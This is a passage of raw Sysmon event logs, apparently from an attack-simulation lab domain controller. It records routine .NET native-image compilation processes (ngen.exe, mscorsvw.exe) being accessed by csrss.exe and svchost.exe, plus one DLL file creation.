C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.069","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00106EE40D00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226A-5F25-0000-00102E7E0E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226A-5F25-0000-00102E7E0E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.132\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226A-5F25-0000-00108B810E00}\r\nTargetProcessId: 1628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.132","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226A-5F25-0000-00108B810E00}","TargetProcessId":"1628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.132\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226A-5F25-0000-00108B810E00}\r\nTargetProcessId: 1628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.132","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226A-5F25-0000-00108B810E00}","TargetProcessId":"1628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:02.132\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226A-5F25-0000-00108B810E00}\r\nTargetProcessId: 1628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:02.132","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226A-5F25-0000-00108B810E00}","TargetProcessId":"1628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:02.960\r\nProcessGuid: {41C8662E-226A-5F25-0000-00108B810E00}\r\nProcessId: 1628\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\65c-0\\System.ComponentModel.Composition.dll\r\nCreationUtcTime: 2020-08-01 08:06:02.960","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:02.960","ProcessGuid":"{41C8662E-226A-5F25-0000-00108B810E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\65c-0\\System.ComponentModel.Composition.dll","CreationUtcTime":"2020-08-01 08:06:02.960","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010215C0B00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010215C0B00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010215C0B00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010215C0B00}","TargetProcessId":"4464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.069\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010BA880E00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 